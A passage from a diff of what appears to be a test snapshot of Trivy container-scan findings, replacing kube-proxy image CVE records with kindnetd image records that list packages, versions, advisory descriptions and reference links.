'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-17543", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", - "https://access.redhat.com/security/cve/CVE-2019-17543", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", - "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", - "https://github.com/lz4/lz4/issues/801", - "https://github.com/lz4/lz4/pull/756", - "https://github.com/lz4/lz4/pull/760", - "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", - "https://security.netapp.com/advisory/ntap-20210723-0001/", - "https://www.cve.org/CVERecord?id=CVE-2019-17543", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2020.html", - ], - }, - "category": "Vulnerability", - "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "lz4: heap-based buffer overflow in LZ4_write32", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-17543", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-17543", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/issues/801", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/756", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/760", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "5.2.4-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "5.2.5-2.1~deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-1271", - "installedVersion": "5.2.4-1", + "installedVersion": "5.2.5-2", "packageName": "liblzma5", "references": [ "https://access.redhat.com/errata/RHSA-2022:4940", @@ -160694,7 +161208,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "arbitrary-file-write vulnerability", "references": [ @@ -160795,359 +161309,246 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - }, - { - "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-14155", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - "https://access.redhat.com/security/cve/CVE-2020-14155", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2020-14155.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", - "https://security.netapp.com/advisory/ntap-20221028-0010/", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2020-14155", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.pcre.org/original/changelog.txt", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Integer overflow when parsing callout numeric arguments", + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-14155", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", - }, - { - "type": "URL", - "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-14155", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/717920", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-11164", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://openwall.com/lists/oss-security/2017/07/11/3", @@ -161163,7 +161564,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ @@ -161213,9 +161614,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-16231", - "installedVersion": "2:8.39-12", + "installedVersion": 